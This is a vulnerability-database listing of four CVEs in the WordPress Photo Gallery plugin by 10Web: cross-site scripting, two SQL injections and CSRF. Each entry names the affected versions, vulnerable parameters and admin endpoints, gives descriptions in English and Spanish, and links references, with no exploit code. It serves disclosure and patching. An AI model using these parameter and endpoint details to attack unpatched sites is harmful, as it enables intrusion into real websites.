CVE-2015-1394 – Photo Gallery by 10Web <= 1.2.10 - Authenticated Cross-Site Scripting
https://notcve.org/view.php?id=CVE-2015-1394
Multiple cross-site scripting (XSS) vulnerabilities in the Photo Gallery plugin before 1.2.11 for WordPress allow remote authenticated users to inject arbitrary web script or HTML via the (1) sort_by, (2) sort_order, (3) items_view, (4) dir, (5) clipboard_task, (6) clipboard_files, (7) clipboard_src, or (8) clipboard_dest parameters in an addImages action to wp-admin/admin-ajax.php. Múltiples vulnerabilidades de tipo cross-site scripting (XSS) en el plugin Photo Gallery versiones anteriores a 1.2.11 para WordPress, permiten a usuarios autenticados remotos inyectar script web o HTML arbitrario por medio de los parámetros (1) sort_by, (2) sort_order, (3) items_view, (4 ) dir, (5) clipboard_task, (6) clipboard_files, (7) clipboard_src o (8) clipboard_dest en una acción addImages en el archivo wp-admin/admin-ajax.php. WordPress Photo Gallery plugin version 1.2.8 suffers from a cross site scripting vulnerability. • http://www.securityfocus.com/archive/1/archive/1/534568/100/0/threaded https://plugins.trac.wordpress.org/changeset/1073334 https://plugins.trac.wordpress.org/changeset/1076678/photo-gallery https://seclists.org/bugtraq/2015/Jan/140 https://wordpress.org/plugins/photo-gallery/changelog • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVE-2015-1393 – Photo Gallery by 10Web <= 1.2.10 - Authenticated SQL Injection via asc_or_desc Parameter
https://notcve.org/view.php?id=CVE-2015-1393
SQL injection vulnerability in the Photo Gallery plugin before 1.2.11 for WordPress allows remote authenticated users to execute arbitrary SQL commands via the asc_or_desc parameter in a create gallery request in the galleries_bwg page to wp-admin/admin.php. Vulnerabilidad de inyección SQL en el plugin Photo Gallery anterior a 1.2.11 para WordPress permite a usuarios remotos autenticados ejecutar comandos SQL arbitrarios a través del parámetro asc_or_desc en una solicitud para crear galería en la página galleries_bwg en wp-admin/admin.php. WordPress Photo Gallery plugin version 1.2.8 suffers from a remote SQL injection vulnerability. • http://www.securityfocus.com/archive/1/534569/100/0/threaded https://plugins.trac.wordpress.org/changeset/1074134/photo-gallery • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVE-2015-1055 – Photo Gallery by 10Web <= 1.2.7 - Unauthenticated Blind SQL Injection via order_by Parameter
https://notcve.org/view.php?id=CVE-2015-1055
SQL injection vulnerability in the Photo Gallery plugin 1.2.7 for WordPress allows remote attackers to execute arbitrary SQL commands via the order_by parameter in a GalleryBox action to wp-admin/admin-ajax.php. Vulnerabilidad de inyección SQL en el plugin Photo Gallery 1.2.7 para WordPress permite a atacantes remotos ejecutar comandos SQL arbitrarios a través del parámetro order_by en una acción GalleryBox en wp-admin/admin-ajax.php. • http://seclists.org/fulldisclosure/2015/Jan/36 http://www.securityfocus.com/bid/72015 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVE-2015-9380 – Photo Gallery by 10Web <= 1.2.41 - Cross-Site Request Forgery
https://notcve.org/view.php?id=CVE-2015-9380
The photo-gallery plugin before 1.2.42 for WordPress has CSRF. El plugin photo-gallery anterior a la versión 1.2.42 para WordPress tiene CSRF. The Photo Gallery plugin before 1.2.42 for WordPress has CSRF. • https://wordpress.org/plugins/photo-gallery/#developers https://wordpress.org/support/topic/this-plugin-is-reported-as-vulnerable https://wpvulndb.com/vulnerabilities/7225 • CWE-352: Cross-Site Request Forgery (CSRF) •